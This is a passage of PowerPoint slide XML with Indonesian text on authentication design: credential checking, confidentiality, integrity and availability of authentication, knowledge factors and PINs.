              <a:t>menerapkan</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> dan </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>memelihara</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>sistem</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>otentikasi</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> yang </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>kuat</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t>.</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:endParaRPr lang="en-ID" b="1" dirty="0"/>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-ID" b="1" dirty="0"/>
              <a:t>Desain </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" b="1" dirty="0" err="1"/>
              <a:t>Autentikasi</a:t>
            </a:r>
            <a:endParaRPr lang="en-ID" b="1" dirty="0"/>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>Otentikasi</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>dilakukan</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>ketika</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>pemohon</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>atau</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>penuntut</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>memberikan</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>kredensial</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>ke</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> server </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>otentikasi</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t>. Server </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>membandingkan</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>apa</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> yang </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>disajikan</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>dengan</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>salinan</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>kredensial</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> yang </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>telah</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>disimpan</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t>. Jika </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>cocok</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t>, </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>akun</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>akan</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>diautentikasi</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t>. Desain </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>otentikasi</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>mengacu</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> pada </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>pemilihan</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>teknologi</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> yang </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>memenuhi</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>persyaratan</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>kerahasiaan</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t>, </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>integritas</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t>, dan </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>ketersediaan</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t>:</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr marL="171450" indent="-171450">
              <a:buFontTx/>
              <a:buChar char="-"/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-ID" b="1" dirty="0" err="1"/>
              <a:t>Kerahasiaan</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t>, </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>dalam</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>hal</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>otentikasi</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t>, sangat </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>penting</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t>, </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>karena</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>jika</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>kredensial</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>akun</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> bocor, </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>pelaku</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>ancaman</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>dapat</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>menyamar</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>sebagai</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>pemegang</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>akun</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> dan </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>bertindak</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> pada </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>sistem</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>dengan</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>hak</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>apa</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> pun yang </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>mereka</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>miliki</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t>.</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr marL="171450" indent="-171450">
              <a:buFontTx/>
              <a:buChar char="-"/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-ID" b="1" dirty="0" err="1"/>
              <a:t>Integritas</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>berarti</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>bahwa</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>mekanisme</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>otentikasi</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>dapat</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>diandalkan</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> dan </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>tidak</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>mudah</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>untuk</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>dilewati</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>atau</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>diakali</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> oleh </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>pelaku</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>ancaman</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>dengan</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>kredensial</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>palsu</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t>.</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr marL="171450" indent="-171450">
              <a:buFontTx/>
              <a:buChar char="-"/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-ID" b="1" dirty="0" err="1"/>
              <a:t>Ketersediaan</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>berarti</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>waktu</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> yang </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>dibutuhkan</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>untuk</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>mengautentikasi</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>tidak</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>menghambat</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>alur</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>kerja</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> dan </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>cukup</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>mudah</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>untuk</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>dioperasikan</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> oleh </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>pengguna</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t>.</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:endParaRPr lang="en-ID" dirty="0"/>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t>Ada </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>banyak</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>teknologi</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> yang </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>berbeda</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>untuk</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>menentukan</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>kredensial</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t>. Ini </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>dapat</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>dikategorikan</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>sebagai</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>faktor</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t>. Faktor </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>autentikasi</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> yang paling lama </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>bertahan</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>adalah</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> "Something You Know" </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>atau</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>faktor</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>pengetahuan</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63</a:t>
            </a:fld>
            <a:endParaRPr lang="en-ID"/>
          </a:p>
        </p:txBody>
      </p:sp>
    </p:spTree>
    <p:extLst>
      <p:ext uri="{BB962C8B-B14F-4D97-AF65-F5344CB8AC3E}">
        <p14:creationId xmlns:p14="http://schemas.microsoft.com/office/powerpoint/2010/main" val="5352285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Nomor</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>identifikasi</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>pribadi</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> (PIN) juga </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>merupakan</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>sesuatu</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> yang Anda </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>ketahui</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t>. </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>Awalnya</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t>, PIN </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>dikaitkan</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>dengan</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>urutan</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>angka</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>pendek</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>empat</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>atau</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>enam</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> digit yang </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>digunakan</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> pada </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>kartu</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> bank. Dalam </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>desain</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>autentikasi</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> modern, </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>karakteristik</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>utama</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> PIN </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>adalah</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>bahwa</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> PIN </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>hanya</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>berlaku</a:t>
            </a:r>
            <a:r>
